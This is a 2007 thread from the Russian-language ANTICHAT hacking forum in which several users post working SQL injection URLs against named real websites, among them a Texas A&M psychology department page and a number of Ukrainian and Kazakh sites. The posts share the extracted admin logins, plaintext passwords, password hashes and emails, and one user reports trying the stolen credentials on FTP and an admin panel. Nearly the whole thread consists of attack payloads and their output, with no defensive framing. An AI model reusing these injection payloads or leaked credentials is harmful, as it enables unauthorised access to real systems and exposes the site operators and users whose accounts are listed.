HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 28.08.2007, 16:42
ENFIX
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
Провел на форуме:
1628290

Репутация: 474
По умолчанию

Texas A & M University Psychology Department Home Page
Цитата:
http://psychology.tamu.edu/Fac_Ext.php?ID=99999999+union+select+1,2,3,4,5,6,7 ,8,9,aes_decrypt(aes_encrypt(concat_ws(0x3a,userna me,password),1),1),11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33,34+from+admi ns+limit+2,1/*
]
Код:
http://psychology.tamu.edu/admin
galexander:narf
 
Ответить с цитированием

  #2  
Старый 28.08.2007, 16:46
noisia
Познающий
Регистрация: 13.03.2007
Сообщений: 55
Провел на форуме:
297449

Репутация: 17
По умолчанию

2RAUL

http://4u.sport.com.ua/players.phtml?country_id=1&player_id=-1+union+select+1,id,3+from+users/*

http://4u.sport.com.ua/players.phtml?country_id=1&player_id=-1+union+select+1,password,3+from+users/*

ID = 1
PASS = 91c0a0fbe2633617b9400c60ba9e0127

p.s в титле пишет
pps http://4u.sport.com.ua/players.phtml?country_id=1&player_id=-1+union+select+1,name,3+from+players+limit+1,1/*

Последний раз редактировалось noisia; 28.08.2007 в 16:54..
 
Ответить с цитированием

  #3  
Старый 28.08.2007, 19:07
noisia
Познающий
Регистрация: 13.03.2007
Сообщений: 55
Провел на форуме:
297449

Репутация: 17
По умолчанию

_http://www.okp.kz/index.php?p=33+union+select+1,concat(login,0x3a,0x 3a,0x3a,pwd,0x3a,0x3a,0x3a,0x3a,email),3,4,5,6,7,8 ,9,10+from+users/*

зацените))
 
Ответить с цитированием

  #4  
Старый 28.08.2007, 19:33
noisia
Познающий
Регистрация: 13.03.2007
Сообщений: 55
Провел на форуме:
297449

Репутация: 17
По умолчанию

_http://www.innovation.kz/index.php?p=43+union+select+1,2,3,pwd,5,6,7,8,9,10 ,11,12,13+from+users/*

пароли и мыла, логин так и ненашел((
 
Ответить с цитированием

  #5  
Старый 28.08.2007, 20:52
Nazaret2005
Новичок
Регистрация: 11.08.2007
Сообщений: 25
Провел на форуме:
131466

Репутация: 11
Talking

Цитата:
Сообщение от noisia  
_http://www.innovation.kz/index.php?p=43+union+select+1,2,3,pwd,5,6,7,8,9,10 ,11,12,13+from+users/*

пароли и мыла, логин так и ненашел((
Держы,тут подключения идёт через почту

Код:
http://www.innovation.kz/index.php?p=43+union+select+1,2,3,id,5,concat(email,char(58),pwd),7,8,9,10,11,12,13+from+users/*
 
Ответить с цитированием

  #6  
Старый 28.08.2007, 19:39
noisia
Познающий
Регистрация: 13.03.2007
Сообщений: 55
Провел на форуме:
297449

Репутация: 17
По умолчанию

http://www.lifestory.kz/index.php?p=32+union+select+1,concat(login,0x3a,0x 3a,0x3a,0x3a,0x3a,0x3a,pwd,0x3a,0x3a,0x3a,0x3a,0x3 a,0x3a,0x3a,0x3a,email),3,4,5,6,7,8,9,10+from+user s/*

вот еще красивая)
 
Ответить с цитированием

  #7  
Старый 28.08.2007, 21:55
Nazaret2005
Новичок
Регистрация: 11.08.2007
Сообщений: 25
Провел на форуме:
131466

Репутация: 11
Arrow

Цитата:
http://www.upyos.com/?cat=-11+union+select+111,2222,333,444,555,666,777,888,9 99,000,123,456,789,010/*
 
Ответить с цитированием

  #8  
Старый 28.08.2007, 23:06
halkfild
Постоянный
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941

Репутация: 2277
По умолчанию

Цитата:
http://www.bt-lady.com.ua/?show_bs=yes&id=-20+union+select+concat_ws(0x3a,version(),database( ),user()),2,3/*
4.0.26-standard:bt-lady:bt-lad

Цитата:
http://www.bt-lady.com.ua/?show_bs=yes&id=-20+union+select+concat_ws(0x3a,username,user_passw ord,user_email),2,3+from+phpbb_users+where+user_le vel=1/*
администратор:32c264cbd961295d

Последний раз редактировалось halkfild; 28.08.2007 в 23:14..
 
Ответить с цитированием

  #9  
Старый 29.08.2007, 06:53
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
По умолчанию

Цитата:
Сообщение от halkfild  
4.0.26-standard:bt-lady:bt-lad

администратор:32c264cbd961295d
в общем не знаю как на реагируют на доработку чужих инъекций (один раз какой то агро попался -)) о.О или тут так принято?)
но все же решил добавить чуть побольше информации...
http://www.bt-lady.com.ua/?show_bs=yes&id=-20+union+select+concat_ws(0x3a,username,user_passw ord,user_email),user(),user_password+from+phpbb_us ers+where+user_level=1/*

администратор:32c264cbd961295d

bt-lady@localhost
32c264cbd961295d38f038b560128362
_____
попробовал зайти на фтп (не загрузилось. в админку тоже не пускает с такими данными)
_____
Michelle:d650735de450759a3a801

bt-lady@localhost
d650735de450759a3a801c4174469d2f

Последний раз редактировалось Calcutta; 29.08.2007 в 06:57..
 
Ответить с цитированием

  #10  
Старый 28.08.2007, 23:28
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию

Не могу подобрать колонку юзеров,хотя пароли мыла нашел 4 мускул

код:

http://svadba.net.ru/info.php?id=-4077'+union+select+1,2,3,concat(email,pass),5,6,7, 8,9+from+users/*

p.s прошу прощения если боян,так как со смарта юзать антибоян неблагодарное дело

Последний раз редактировалось fobofob; 28.08.2007 в 23:38.. Причина: .
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.